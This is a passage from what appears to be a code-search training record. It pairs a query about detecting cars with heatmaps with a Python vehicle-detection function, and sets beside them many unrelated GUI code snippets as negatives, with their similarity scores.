tk.Frame(self._master)\n frame1.pack(side=tk.LEFT)\n\n self.ballimage = tk.PhotoImage(file=\"./images/full_pokeball.gif\")\n self.ball = tk.Label(frame1, image=self.ballimage)\n self.ball.pack(side=tk.LEFT)\n\n self.balls = frame1\n self.ballup = tk.Label(self.balls, text=f'{self.pokeballs} attemped catches')\n self.ballup.pack(side=tk.TOP)\n self.balldown = tk.Label(self.balls, text=f'{self._num_pokemon - self.pokeballs} pokeballs left')\n self.balldown.pack(side=tk.BOTTOM)\n self.balls.pack(side=tk.LEFT)\n\n #insert image of clock\n frame2 = tk.Frame(self._master)\n frame2.pack(side=tk.LEFT)\n\n self.clockimage = tk.PhotoImage(file=\"./images/clock.gif\")\n self.clock = tk.Label(frame2, image=self.clockimage)\n self.clock.pack(side=tk.LEFT)\n\n #insert the button of \"New game\" and \" Restart game\"\n self.buttons = tk.Frame(self)\n self.n = tk.Button(self.buttons, text=\"New game\")\n self.r = tk.Button(self.buttons, text=\"Restart game\")\n self.n.pack(side=tk.TOP)\n self.r.pack(side=tk.BOTTOM)\n self.buttons.pack(side=tk.RIGHT)", "def _updateBoundingRect(self):\n self.setPen(QPen(Qt.NoPen))\n self.setRect(self.childrenBoundingRect())\n # move and show or hide the buttons if necessary\n addButton = self._addBasesButton\n rmButton = self._removeBasesButton\n if len(self._virtualHelixItemList) > 0:\n addRect = addButton.boundingRect()\n rmRect = rmButton.boundingRect()\n x = self._vHRect.right()\n y = -styles.PATH_HELIX_PADDING\n addButton.setPos(x, y)\n rmButton.setPos(x-rmRect.width(), y)\n addButton.show()\n rmButton.show()\n else:\n addButton.hide()\n rmButton.hide()", "def __init__(self):\n self.window = Tk()\n self.window.title(\"Brick Breaker\")\n self.window.attributes(\"-fullscreen\", True)\n self.window.iconbitmap(\"data/wall.ico\")\n self.window.config(background=\"light blue\")\n\n # initialization des composants\n self.frame = Frame(self.window, bg='light blue')\n self.littleFrame = Frame(self.frame, bg='light blue')\n self.littleFrame_bis = LabelFrame(self.frame, bg='light blue', text=\"USER NAME\")\n\n # creation des composants\n self.create_title()\n self.create_subtitle()\n self.create_play_button()\n self.create_quit_button()\n\n # empaquetage\n self.littleFrame_bis.pack(expand=YES, pady=30)\n self.littleFrame.pack(expand=YES, pady=50)\n self.frame.pack(expand=YES, fill=BOTH, pady=200)", "def slider_frames_changed(self):\n\n # Again, please note the difference between indexing and GUI displays.\n index = self.slider_frames.value() - 1\n\n # Differentiate between frame ordering (by quality or chronologically).\n if self.frame_ordering == \"quality\":\n self.frame_index = self.quality_sorted_indices[index]\n self.quality_index = index\n\n else:\n self.frame_index = index\n self.quality_index = self.rank_indices[self.frame_index]\n\n # Adjust the frame list and select the current frame.\n\n self.listWidget.setCurrentRow(index, QtCore.QItemSelectionModel.SelectCurrent)\n\n # Update the image in the viewer.\n self.frame_selector.setPhoto(self.frame_index)\n self.listWidget.setFocus()", "def redraw(self):\n bpy.context.scene.objects.active = bpy.context.scene.objects.active", "def update_gui(self):\n for where, updates in self.gui_updates.items():\n self.window[where].update(**updates)\n self.gui_updates = {}", "def buttonbox(self):\n\n box = Frame(self)\n b = Button(box, text=\"OK\", width=10, command=self.ok, default=ACTIVE)\n b.pack(side=LEFT, padx=5, pady=5)\n #w = Button(box, text=\"Cancel\", width=10, command=self.cancel)\n a= Button(box, text=\"Autofill\", width=10, command=self.auto_populate, default=ACTIVE)\n a.pack(side=LEFT, padx=5, pady=5)\n #w.pack(side=LEFT, padx=5, pady=5)\n #w[\"state\"] = DISABLED\n\n\n self.bind(\"<Return>\", self.ok)\n self.bind(\"<Escape>\", self.cancel)\n\n box.pack()", "def update(self, box):\n if box is not None:\n self.last_boxes.append(box)\n bound = min(len(self.last_boxes), self.n_frames)\n self.best_box = np.mean(self.last_boxes[-bound:], axis=0).astype(np.uint32)\n\n self.frames_undetected = 0\n else:\n self.frames_undetected += 1\n\n self.age += 1", "def update_bbox(self, viewer, dims):\n title = self.get_title()\n self._title.text = title if title is not None else '555.55'\n self.title_wd, self.txt_ht = viewer.renderer.get_dimensions(self._title)\n\n wd, ht = dims[:2]\n y_hi = ht\n if title is not None:\n # remove Y space for X axis title\n y_hi -= self.txt_ht + 4\n # remove Y space for X axis labels\n y_hi -= self.txt_ht + self.pad_px\n\n self.aide.update_plot_bbox(y_hi=y_hi)", "def edit(self):\n self.toplevel = tk.Toplevel()\n # ============================= Frame Setup\n # Get Frames for each side of the editor\n self.leftSide = tk.LabelFrame(self.toplevel, text=\"Leftside\")\n self.rightSide = tk.LabelFrame(self.toplevel, text=\"Rightside\")\n self.leftSide.pack(side=tk.LEFT, fill=tk.BOTH, expand=True)\n self.rightSide.pack(side=tk.LEFT, fill=tk.BOTH, expand=True)\n #### Build the leftside\n # Frame for controlling the title of node\n self.titleFrame = tk.LabelFrame(self.leftSide, text=\"Title\")\n self.titleFrame.pack(side=tk.TOP, fill=tk.X, expand=False)\n self.titleEntry = tk.Entry(self.titleFrame)\n self.titleEntry.pack(side=tk.LEFT, fill=tk.X, expand=True)\n self.titleUpdateButton = tk.Button(self.titleFrame, text=\"Update\", command=self.update_title_from_entry)\n self.titleUpdateButton.pack(side=tk.LEFT)\n # ============================= EditorFrame\n self.editorFrame = tk.Frame(self.leftSide)\n self.editorFrame.pack(side=tk.TOP, fill=tk.BOTH, expand=True)\n self.textWidget = tk.Text(self.editorFrame)\n self.textWidget.pack(side=tk.TOP, fill=tk.BOTH, expand=True)\n # ============================= Status Bar\n self.statusFrame = tk.LabelFrame(self.leftSide, text=\"Status\", relief=tk.SUNKEN)\n self.statusFrame.pack(side=tk.TOP, fill=tk.X, expand=False)\n self.wordWrapStatus = tk.Menubutton(self.statusFrame)\n self.wordWrapStatus.pack()\n # ============================== Buttons on the right side of the editor\n self.buttonFrame = tk.Frame(self.rightSide)\n self.buttonFrame.pack(side=tk.TOP)\n self.saveButton = tk.Button(self.buttonFrame, text=\"save\", command=self.on_editor_save, bg=\"green\")\n self.exitButton = tk.Button(self.buttonFrame, text=\"exit\", command=self.on_editor_exit, bg=\"red\")\n self.saveButton.pack(side=tk.LEFT, fill=tk.X, expand=True)\n self.exitButton.pack(side=tk.LEFT, fill=tk.X, expand=True)\n # insert title of node into title entry\n self.titleEntry.insert(tk.END, self.title)\n # insert contents of node into textwidget\n self.textWidget.insert(tk.END, self.text)", "def _change_coordinate_frame(self, boxes, window):\n with tf.name_scope('change_coordinate_frame'):\n\n ymin, xmin, ymax, xmax = tf.unstack(boxes, axis=1)\n ymin -= window[0]\n xmin -= window[1]\n ymax -= window[0]\n xmax -= window[1]\n\n win_height = window[2] - window[0]\n win_width = window[3] - window[1]\n boxes = tf.stack([\n ymin/win_height, xmin/win_width,\n ymax/win_height, xmax/win_width\n ], axis=1)\n boxes = tf.cond(tf.greater(tf.shape(boxes)[0], 0),\n lambda: tf.clip_by_value(boxes, clip_value_min=0.0, clip_value_max=1.0),\n lambda: boxes\n )\n # boxes = tf.clip_by_value(boxes, clip_value_min=0.0, clip_value_max=1.0) - work_element_count > 0 (0 vs. 0)\n return boxes", "def model_refresh(self):\n for x in range(self._dim):\n for y in range(self._dim):\n if self._board[x][y]:\n self.canvas.itemconfig(self.rect[y,x], fill=self._secondary_color)\n else:\n self.canvas.itemconfig(self.rect[y,x], fill=self._primary_color)", "def main():\n global fenetre, gr_grid,grid,steps,btn\n fenetre = Frame()\n fenetre.grid()\n fenetre.master.title('Rush Hour')\n flabel = Frame(fenetre)\n flabel.grid()\n steps=StringVar()\n Label(flabel, textvariable=steps).pack()\n steps.set(str(len(l))+\" steps remaining\")\n background = Frame(fenetre, bg = game_bg, width=game_size, height=game_size)\n background.grid()\n gr_grid = []\n for i in range(6):\n gr_line = []\n for j in range(6):\n cell = Frame(background, bg = tiles_empty_bg, width = tiles_size, height = tiles_size)\n cell.grid(row=i, column=j,padx=1, pady=1)\n t = Label(master = cell, text = \"\", bg = tiles_empty_bg, justify = CENTER, font = tiles_font, width=4, height=2)\n t.grid()\n gr_line.append(t)\n gr_grid.append(gr_line)\n\n board_display(my_board)\n button=Frame(fenetre)\n button.grid()\n btn=StringVar()\n Button(button, textvariable=btn, command=next_step).pack(side=BOTTOM)\n btn.set(\"Next step\")\n fenetre.mainloop()", "def __init__(self):\n EasyFrame.__init__(self, title = \"Game Time\")\n self.setSize(440, 400)\n self.cardLabel1 = self.addLabel(\"\", row = 0,\n column = 0,\n sticky = \"NSEW\")\n self.cardLabel2 = self.addLabel(\"\", row = 0,\n column = 1,\n sticky = \"NSEW\")\n self.cardLabel3 = self.addLabel(\"\", row = 0,\n column = 2,\n sticky = \"NSEW\")\n self.stateLabel = self.addLabel(\"\", row = 1, column = 0,\n sticky = \"NSEW\",\n columnspan = 2)\n self.addButton(row = 2, column = 0,\n text = \"New game\",\n command = self.newDeal)\n self.addButton(row = 2, column = 2,\n text = \"Quit\",\n command = self.quit)", "def __init__(self, master, width, height, number):\n Frame.__init__(self, master)\n # create list of minesweeper cell coords\n cellCoords = []\n for h in range(height):\n for w in range(width):\n cellCoords.append((h, w))\n random.shuffle(cellCoords)\n # find bombs\n self.bombCoords = cellCoords[:number]\n self.bombs = []\n for bomb in self.bombCoords:\n self.bombs.append(MsCell(bomb, True, self))\n # make the rest non-bomb cells\n self.cellCoords = cellCoords[number:]\n self.nonExposed = self.cellCoords[:]\n self.nonBombcells = []\n for cell in self.cellCoords:\n adjacentBombs = 0\n for h in range(max(0, cell[0] - 1), min(cell[0] + 2, height)):\n for w in range(max(0, cell[1] - 1), min(cell[1] + 2, width)):\n if (h, w) in self.bombCoords:\n adjacentBombs += 1\n self.nonBombcells.append(MsCell(cell, adjacentBombs, self))\n # set cell\n self.number = number\n self.height = height\n self.width = width\n # set number label\n self.numberLabel = Label(master, text=str(self.number))\n self.numberLabel.grid(row=self.height, columnspan=self.width)" ]
[ "0.6689228", "0.66155696", "0.65819746", "0.6271218", "0.6260631", "0.6133513", "0.6128093", "0.611145", "0.60912585", "0.6082675", "0.6053892", "0.6053803", "0.6029776", "0.6003047", "0.596538", "0.5959297", "0.5884809", "0.58832145", "0.5862301", "0.5841208", "0.58308303", "0.57989013", "0.57987803", "0.5797244", "0.5791403", "0.5784546", "0.5780775", "0.5772115", "0.5767569", "0.5767495", "0.57668906", "0.57662743", "0.57606494", "0.57595444", "0.57565504", "0.5753179", "0.57503575", "0.57469773", "0.57406175", "0.57345307", "0.57290334", "0.5719542", "0.57144344", "0.5697462", "0.56873125", "0.56761235", "0.5671979", "0.5670261", "0.56625366", "0.5658493", "0.5655677", "0.56529945", "0.5651338", "0.56510246", "0.56491196", "0.56479603", "0.56417894", "0.5639551", "0.5628968", "0.56281054", "0.5625314", "0.5613899", "0.56133354", "0.56125075", "0.5611274", "0.5609017", "0.5595006", "0.5589591", "0.5566292", "0.55658174", "0.5563702", "0.5563702", "0.5563702", "0.55627745", "0.5561714", "0.5547096", "0.5546323", "0.55448854", "0.5543346", "0.55381083", "0.5533458", "0.5532142", "0.55311716", "0.5529818", "0.55272126", "0.55232203", "0.55182475", "0.5516737", "0.5512368", "0.5506762", "0.5506394", "0.55038446", "0.5490902", "0.5482481", "0.5479571", "0.5476376", "0.5461994", "0.5455747", "0.5454042", "0.54509264" ]
0.62919223
3
detect cars on image using historical information and heatmap
def detect(self, img, thresh_hold, show=False): heat = np.zeros_like(img[:,:,0]).astype(np.float) # heatmap for all boxes found in last n_frames frame heat = add_heat(heat,self.boxes) # threshold for multiple frames thresh = thresh_hold*len(self.lengths) # initialization if len(self.lengths) == 0: thresh = thresh_hold heat = apply_threshold(heat,thresh) # Visualize the heatmap when displaying heatmap = np.clip(heat, 0, 255) # Find final boxes from heatmap using label function labels = label(heatmap) draw_img = draw_labeled_bboxes(np.copy(img), labels) if show: plot_dual(draw_img, heatmap,'Car positions','Heat Map',cm2='hot') return draw_img
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def find_cars(img, scale):\n img_boxes = [] # Clears img_boxes so we don't keep unwanted heatmap history\n count = 0\n draw_img = np.copy(img)\n\n # Make a heatmap of zeros\n heatmap = np.zeros_like(img[:, :, 0])\n\n # IMPORTANT : reading *.jpeg's (scaled 0-255, aka scaling needed), but\n # # trained on *.png's (scaled 0-1, aka scaling not needed)\n if img.dtype == 'uint8':\n img = img.astype(np.float32) / 255 # aka scaling needed\n\n img_tosearch = img[ystart:ystop, :, :]\n ctrans_tosearch = convert_color(img_tosearch, conv='RGB2YCrCb')\n\n if scale != 1: # resize whole image instead of separate windows\n imshape = ctrans_tosearch.shape\n ctrans_tosearch = cv2.resize(ctrans_tosearch, (np.int(imshape[1] / scale), np.int(imshape[0] / scale)))\n\n ch1 = ctrans_tosearch[:, :, 0]\n ch2 = ctrans_tosearch[:, :, 1]\n ch3 = ctrans_tosearch[:, :, 2]\n\n # Define blocks and steps as above\n # These hold the number of HOG cells\n nxblocks = (ch1.shape[1] // pix_per_cell) - 1 # Note : '//' causes integers to be result, instead of floats\n nyblocks = (ch1.shape[0] // pix_per_cell) - 1\n # How many features per block are we going to be extracting\n nfeat_per_block = orient * cell_per_block ** 2\n window = 64\n nblocks_per_window = (window // pix_per_cell) - 1\n # aka 75% overlap between cells\n cells_per_step = 2 # Instead of overlap, define how many cells to step\n nxsteps = (nxblocks - nblocks_per_window) // cells_per_step\n nysteps = (nyblocks - nblocks_per_window) // cells_per_step\n\n # Compute individual channel HOG features for the entire image\n hog1 = get_hog_features(ch1, orient, pix_per_cell, cell_per_block, feature_vec=False)\n hog2 = get_hog_features(ch2, orient, pix_per_cell, cell_per_block, feature_vec=False)\n hog3 = get_hog_features(ch3, orient, pix_per_cell, cell_per_block, feature_vec=False)\n\n for xb in range(nxsteps):\n for yb in range(nysteps):\n count += 1\n ypos = yb * cells_per_step\n xpos = xb * cells_per_step\n # Extract HOG for this patch\n hog_feat1 = hog1[ypos:ypos + nblocks_per_window, xpos:xpos + nblocks_per_window].ravel()\n hog_feat2 = hog2[ypos:ypos + nblocks_per_window, xpos:xpos + nblocks_per_window].ravel()\n hog_feat3 = hog3[ypos:ypos + nblocks_per_window, xpos:xpos + nblocks_per_window].ravel()\n hog_features = np.hstack((hog_feat1, hog_feat2, hog_feat3))\n\n xleft = xpos * pix_per_cell\n ytop = ypos * pix_per_cell\n\n # Extract the image patch\n subimg = cv2.resize(ctrans_tosearch[ytop:ytop + window, xleft:xleft + window], (64, 64))\n\n # Get colour features\n spatial_features = bin_spatial(subimg, size=spatial_size)\n hist_features = color_hist(subimg, nbins=hist_bins)\n\n # Scale features and make a prediction\n test_features = X_scaler.transform(\n np.hstack((spatial_features, hist_features, hog_features)).reshape(1, -1))\n test_prediction = svc.predict((test_features))\n\n if test_prediction == 1:\n xbox_left = np.int(xleft * scale)\n ytop_draw = np.int(ytop * scale)\n win_draw = np.int(window * scale)\n cv2.rectangle(draw_img, (xbox_left, ytop_draw + ystart),\n (xbox_left + win_draw, ytop_draw + win_draw + ystart), (0, 0, 255))\n img_boxes.append(\n ((xbox_left, ytop_draw + ystart), (xbox_left + win_draw, ytop_draw + win_draw + ystart)))\n heatmap[ytop_draw + ystart:ytop_draw + win_draw + ystart, xbox_left:xbox_left + win_draw] += 1\n\n return draw_img, img_boxes, heatmap", "def process_image( self, image ):\n \n # 1. detect cars in image at different scales\n \n # Modify x/y start stop according to scale, cars appear smaller near horizon\n scales = config.scales\n \n box_list = []\n for scale_item in scales:\n scale = scale_item[\"scale\"]\n detects_image, boxes = hog_subsample.find_cars(image, \n scale_item[\"y_start_stop\"][0], scale_item[\"y_start_stop\"][1], \n scale, \n config.settings[\"svc\"], \n config.settings[\"scaler\"], \n config.settings[\"orient\"], \n config.settings[\"pix_per_cell\"], config.settings[\"cell_per_block\"], \n config.settings[\"spatial_size\"], config.settings[\"hist_bins\"],\n scale_item[\"x_start_stop\"][0], scale_item[\"x_start_stop\"][1])\n box_list.extend(boxes)\n \n # Update history\n self.bbox_list_history.append( box_list )\n bbox_list_history_list = sum(self.bbox_list_history.copy(), []) # single list of bbox lists in history\n \n # 2. heat map and threshold\n \n # Make zeros shaped like image\n heat = np.zeros_like(image[:,:,0]).astype(np.float)\n\n # Add heat for each box in box list history\n heat = heatmap_threshold_detection.add_heat(heat, bbox_list_history_list)\n\n # Apply threshold to help remove false positives\n heat_threshold = config.heatmap_threshold\n heat = heatmap_threshold_detection.apply_threshold(heat, heat_threshold)\n\n # Find final boxes from heatmap using label function\n heatmap = np.clip(heat, 0, 255) # only need to clip if there is more than 255 boxes around a point?\n labels = label(heatmap)\n boxed_image = heatmap_threshold_detection.draw_labeled_bboxes(np.copy(image), labels)\n \n # frame image annotation\n font = cv2.FONT_HERSHEY_SIMPLEX\n cv2.putText(boxed_image,\"Frame:{}\".format(config.count), (10,100), font, 1, (255,255,255), 2 ,cv2.LINE_AA )\n \n return boxed_image", "def find_cars(img,\n clf,\n scaler,\n color_space,\n spatial_size,\n hist_bins,\n scale,\n cells_per_step,\n x_start_stop,\n y_start_stop,\n orient,\n pix_per_cell,\n cell_per_block):\n draw_img = np.copy(img)\n\n heatmap = np.zeros_like(img[:, :, 0])\n\n img = img.astype(np.float32)/255\n\n img_to_search = img[y_start_stop[0]:y_start_stop[1], x_start_stop[0]:x_start_stop[1], :]\n\n # color transformed image\n ctrans_to_search = change_color_space(img_to_search, colorspace=color_space)\n\n if scale != 1:\n imshape = ctrans_to_search.shape\n ctrans_to_search = cv2.resize(ctrans_to_search, (np.int(imshape[1]/scale), np.int(imshape[0]/scale)))\n\n ch1 = ctrans_to_search[:, :, 0]\n ch2 = ctrans_to_search[:, :, 1]\n ch3 = ctrans_to_search[:, :, 2]\n\n nxblocks = (ch1.shape[1] // pix_per_cell) - 1 # number of hog cells\n nyblocks = (ch1.shape[0] // pix_per_cell) - 1\n nfeat_per_block = orient*cell_per_block**2\n window = 64\n nblocks_per_window = (window // pix_per_cell) - 1\n\n nxsteps = (nxblocks - nblocks_per_window) // cells_per_step\n nysteps = (nyblocks - nblocks_per_window) // cells_per_step\n\n # compute individual channel HOG features for the intire image\n hog1 = get_hog_features(ch1, orient, pix_per_cell, cell_per_block, feature_vec=False)\n hog2 = get_hog_features(ch1, orient, pix_per_cell, cell_per_block, feature_vec=False)\n hog3 = get_hog_features(ch1, orient, pix_per_cell, cell_per_block, feature_vec=False)\n\n for xb in range(nxsteps):\n for yb in range(nysteps):\n ypos = yb*cells_per_step\n xpos = xb*cells_per_step\n # extract hog features for this patch\n hog_feat1 = hog1[ypos:ypos+nblocks_per_window, xpos:xpos+nblocks_per_window].ravel()\n hog_feat2 = hog2[ypos:ypos+nblocks_per_window, xpos:xpos+nblocks_per_window].ravel()\n hog_feat3 = hog3[ypos:ypos+nblocks_per_window, xpos:xpos+nblocks_per_window].ravel()\n hog_features = np.hstack((hog_feat1, hog_feat2, hog_feat3))\n\n xleft = xpos*pix_per_cell\n ytop = ypos*pix_per_cell\n\n # extract the image path\n subimg = cv2.resize(ctrans_to_search[ytop:ytop+window, xleft:xleft+window], (64,64))\n\n # get color features\n spatial_features = get_bin_spatial(subimg, size=spatial_size)\n hist_features = get_color_hist(subimg, nbins=hist_bins)\n\n # scale features and make prediction\n test_features = scaler.transform(np.hstack((spatial_features, hist_features, hog_features)))\n\n test_prediction = clf.predict(test_features)\n\n if test_prediction == 1:\n xbox_left = np.int(xleft*scale)\n ytop_draw = np.int(ytop*scale)\n win_draw = np.int(window*scale)\n cv2.rectangle(draw_img, (xbox_left+x_start_stop[0], ytop_draw+y_start_stop[0]), (xbox_left+win_draw+x_start_stop[0], ytop_draw+win_draw+y_start_stop[0]), (0,0,255), 6)\n heatmap[ytop_draw+y_start_stop[0]:ytop_draw+win_draw+y_start_stop[0], xbox_left+x_start_stop[0]:xbox_left+win_draw+x_start_stop[0]] += 1\n\n return draw_img, heatmap", "def find_cars(img, ystart, ystop, scale, svc, X_scaler, orient, pix_per_cell, cell_per_block, spatial_size,\n hist_bins):\n draw_img = np.copy(img)\n img_tosearch = img[ystart:ystop, :, :]\n ctrans_tosearch = convert_color(img_tosearch, conv='RGB2YCrCb')\n if scale != 1:\n imshape = ctrans_tosearch.shape\n ctrans_tosearch = cv2.resize(ctrans_tosearch, (np.int(imshape[1] / scale), np.int(imshape[0] / scale)))\n\n # Channel extraction\n ch1 = ctrans_tosearch[:, :, 0]\n ch2 = ctrans_tosearch[:, :, 1]\n ch3 = ctrans_tosearch[:, :, 2]\n\n # Define blocks and steps as above\n nxblocks = (ch1.shape[1] // pix_per_cell) - cell_per_block + 1\n nyblocks = (ch1.shape[0] // pix_per_cell) - cell_per_block + 1\n\n # 64 was the orginal sampling rate, with 8 cells and 8 pix per cell\n window = 64\n nblocks_per_window = (window // pix_per_cell) - cell_per_block + 1\n cells_per_step = 2 # Instead of overlap, define how many cells to step\n nxsteps = (nxblocks - nblocks_per_window) // cells_per_step\n nysteps = (nyblocks - nblocks_per_window) // cells_per_step\n\n # Compute individual channel HOG features for the entire image\n hog1 = get_hog_features(ch1, orient, pix_per_cell, cell_per_block, feature_vec=False)\n hog2 = get_hog_features(ch2, orient, pix_per_cell, cell_per_block, feature_vec=False)\n hog3 = get_hog_features(ch3, orient, pix_per_cell, cell_per_block, feature_vec=False)\n detections = []\n\n for xb in range(nxsteps):\n for yb in range(nysteps):\n ypos = yb * cells_per_step\n xpos = xb * cells_per_step\n # Extract HOG for this patch\n\n # Flatten the HOG features for each channel position\n hog_feat1 = hog1[ypos:ypos + nblocks_per_window, xpos:xpos + nblocks_per_window].ravel()\n hog_feat2 = hog2[ypos:ypos + nblocks_per_window, xpos:xpos + nblocks_per_window].ravel()\n hog_feat3 = hog3[ypos:ypos + nblocks_per_window, xpos:xpos + nblocks_per_window].ravel()\n # Build hog_features array by stacking each channel\n hog_features = np.hstack((hog_feat1, hog_feat2, hog_feat3))\n\n xleft = xpos * pix_per_cell\n ytop = ypos * pix_per_cell\n\n # Extract the image patch\n subimg = cv2.resize(ctrans_tosearch[ytop:ytop + window, xleft:xleft + window], (64, 64))\n\n # Get color features\n spatial_features = bin_spatial(subimg, size=spatial_size)\n hist_features = color_hist(subimg, nbins=hist_bins)\n\n # Scale features and make a prediction\n test_features = X_scaler.transform(\n np.hstack((spatial_features, hist_features, hog_features)).reshape(1, -1))\n test_prediction = svc.predict(test_features)\n confidence = svc.decision_function(test_features)\n\n if test_prediction == 1 and confidence > 0.6:\n xbox_left = np.int(xleft * scale)\n ytop_draw = np.int(ytop * scale)\n win_draw = np.int(window * scale)\n x1 = xbox_left\n y1 = ytop_draw + ystart\n x2 = xbox_left + win_draw\n y2 = ytop_draw + win_draw + ystart\n detections.append((x1, y1, x2, y2))\n return detections", "def detect_vehicles_image(input_img,\n scaler=None,\n classifier=None,\n decision=DECISION_THRESHOLD,\n tracker=None,\n method='heatmap',\n save_path=None,\n prefix=None,\n view=True,\n show=True):\n img = np.copy(input_img)\n # diffent sliding window sizes\n xy_windows = [ (100, 100), (120, 120), (140, 140), (180, 180)]\n xy_overlaps = [(0.50, 0.50), (0.50, 0.50), (0.50, 0.50)]\n all_car_window_list = [] # car window list for all window scales\n\n for i, (xy_window, xy_overlap) in enumerate(zip(xy_windows, xy_overlaps)):\n img_height = img.shape[0]\n img_width = img.shape[1]\n view_height = int(img_height/2)\n y_start_stop=[view_height, img_height]\n xy_nums = (int(view_height/xy_window[1])*2,\n int(img_width/xy_window[0])*2)\n\n window_list = slide_window(img, xy_window=xy_window,\n xy_overlap=xy_overlap, y_start_stop=y_start_stop)\n wprefix = str(prefix) + 'w' + str(i) + 'i'\n #if view:\n #show_grid_view(img, window_list, xy_nums=xy_nums)\n car_window_list = predit_vehicles(\n img, window_list,\n scaler=scaler, classifier=classifier,\n decision=decision,\n save_path=save_path,\n prefix=wprefix)\n all_car_window_list.extend(car_window_list)\n if view:\n show_window_img = draw_boxes(img, all_car_window_list, color=(0, 255, 255), thick=3)\n plt.imshow(show_window_img)\n if show:\n plt.show()\n window_img = None\n if method == 'nms':\n ### track the cars using nms\n track_car_windows = tracker.track_nms(all_car_window_list)\n window_img = draw_boxes(img, track_car_windows, color=(0, 255, 0), thick=3)\n else:\n ### track the cars using heat map and labels\n track_labels = tracker.track_labels(all_car_window_list, view=view)\n #print(track_labels[1], 'cars found')\n window_img= Tracker.draw_labeled_bboxes(img, track_labels)\n\n\n if view:\n plt.imshow(window_img)\n if show:\n plt.show()\n\n return window_img", "def process_frame(self, img):\n found = []\n for scale in self.settings['scales']:\n found.extend(find_cars(img, scale[0], scale[1], scale[2], scale[3], scale[4], self.clf, self.scaler,\n self.settings['color_space'], self.settings['orient'], self.settings['pix_per_cell'],\n self.settings['cell_per_block'], self.settings['spatial_size'],\n self.settings['hist_bins'], self.log, self.settings['min_conf']))\n\n self.prev_frames.append(found)\n if len(self.prev_frames) > self.settings['n_frames']:\n self.prev_frames.pop(0)\n heatmap = np.ones_like(img[:, :, 0]).astype(np.float)\n for frame in self.prev_frames:\n f_heatmap = np.ones_like(img[:, :, 0]).astype(np.float)\n add_heat(f_heatmap, frame)\n heatmap = heatmap * f_heatmap\n\n acc_heatmap = np.copy(heatmap)\n\n bboxes = find_bboxes_from_heatmap(apply_threshold(heatmap,\n self.settings['heat_threshold'] ** self.settings['n_frames']))\n\n if self.settings['DEBUG']:\n single_heatmap = add_heat(np.zeros_like(img[:, :, 0]).astype(np.float), found)\n single_heatmap = np.clip(single_heatmap, 0, 255)\n single_heatmap = np.dstack((single_heatmap, single_heatmap, single_heatmap))\n acc_heatmap = np.sqrt(acc_heatmap)\n acc_heatmap = np.clip(acc_heatmap, 0, 255)\n acc_heatmap = np.dstack((acc_heatmap, acc_heatmap, acc_heatmap))\n labels = np.clip(heatmap, 0, 1)*255\n labels = np.dstack((labels, labels, labels))\n final = draw_boxes(img, bboxes)\n frame = np.concatenate((np.concatenate((single_heatmap, acc_heatmap), axis=1),\n np.concatenate((labels, final), axis=1)), axis=0)\n return cv2.resize(frame, (int(frame.shape[1]/2), int(frame.shape[0]/2)))\n else:\n return draw_boxes(img, bboxes)", "def process_frame(self, img):\n if self.heatmap is None:\n self.heatmap = np.zeros((img.shape[0], img.shape[1], self.n_frames), dtype=np.float32)\n\n img_blur = gaussian_blur(np.copy(img), 3)\n heat = detect_cars_multi_area(img_blur, self.clf, self.xy_window, self.stride, self.y_start_stops,\n self.image_size_factors, self.x_padding, heatmap=True, n_jobs=self.n_jobs)\n\n heat = gaussian_blur(heat, 21)\n self.heatmap[:, :, self.frame_cnt % self.n_frames] = heat\n\n if self.frame_cnt < self.n_frames:\n heat = np.mean(self.heatmap[:, :, :self.frame_cnt], axis=2)\n else:\n heat = np.mean(self.heatmap, axis=2)\n\n heat_thresh = np.zeros(heat.shape, dtype=np.uint8)\n heat_thresh[heat > self.heatmap_thresh] = 255\n\n boxes_contours = bb_by_contours(heat_thresh)\n boxes_contours = self._remove_outliers(boxes_contours)\n\n used_boxes = self._update_detections(boxes_contours)\n\n self._unhide_if_applicable(boxes_contours, used_boxes)\n\n self._create_new_detections(boxes_contours, used_boxes)\n\n self._remove_lost_detections()\n if self.auto_draw:\n img = self.draw_info(img)\n self.frame_cnt += 1\n\n return img", "def process_image(self, img):\n show = False\n # draw_image = np.copy(img)\n # search all scale windows and return cars' windows\n hots = search_scales(img,self.svc, self.X_scaler, self.orient, \n self.pix_per_cell, self.cell_per_block, self.spatial_size, self.hist_bins)\n # update the self boxes\n self.update(hots)\n # detect cars using threshold\n window_image = self.detect(img, 2)\n if show:\n plt.imshow(window_image)\n plt.show()\n return window_image", "def extract_vehicles(self):\n heatmap_threshed = apply_threshold(self.avg_heatmap, 7)\n\n labels = label(heatmap_threshed)\n self.binary_map = labels[0]\n self.number_of_found_cars = labels[1]", "def find_cars_image(image, clf, hyperparams, box_color=None, old_heatmap=None):\n heat_threshold = hyperparams[\"HEAT_THRESHOLD\"]\n # Scan the image and get the new heatmap\n _, heatmap = scan_multiple_win_sizes(image, clf, hyperparams, box_colors=None)\n # Build an aggregated heatmap of this heatmap and the old heatmap\n agg_heatmap = old_heatmap+heatmap if old_heatmap is not None else heatmap\n # Apply threshold to find cars\n thresh_heatmap = apply_threshold(agg_heatmap, heat_threshold)\n # Label cars\n labels_heatmap, n_cars = label(thresh_heatmap)\n # Draw labeled boxes and get bounding boxes\n draw_image, bboxes = draw_labeled_bboxes(np.zeros_like(image), labels_heatmap, n_cars, box_color=box_color)\n # Return values\n return bboxes, draw_image, labels_heatmap, heatmap, agg_heatmap", "def process_image(img):\n avg_heat = np.zeros_like(image[:, :, 0]).astype(np.float)\n out_img, out_boxes, heat_map = find_cars(img, scale)\n\n # -----\n heat = np.zeros_like(image[:, :, 0]).astype(np.float)\n # Add heat to each box in box list\n heat = add_heat(heat, out_boxes)\n\n # Apply threshold to help remove false positives\n heat = apply_threshold(heat, 1)\n # heat = apply_threshold(heat, 2)\n\n avg_heat = cv2.addWeighted(avg_heat, 0.8, heat, 0.2, 0.)\n\n # Apply threshold to help remove near-zero noise\n heatmap = apply_threshold(cv2.blur(avg_heat, (15, 15)), 0.5)\n\n # Visualize the heatmap when displaying\n heatmap = np.clip(heatmap, 0, 255) # limit the values in the heatmap array\n\n # -----\n # Find final boxes from heatmap using label function\n labels = label(heat_map)\n # Draw bounding boxes on a copy of the image\n output_img = draw_labeled_bboxes(np.copy(img), labels)\n\n # -----\n r = 377.0 / avg_heat.shape[1] # calculate height\n dim = (377, int(avg_heat.shape[0] * r)) # width, height\n resized = cv2.resize(avg_heat, dim, interpolation=cv2.INTER_AREA)\n # add to output_img\n output_img[0:0 + resized.shape[0], 0:0 + resized.shape[1]] = np.repeat(resized[:, :, np.newaxis], 3,\n axis=2) * 255\n output_img = 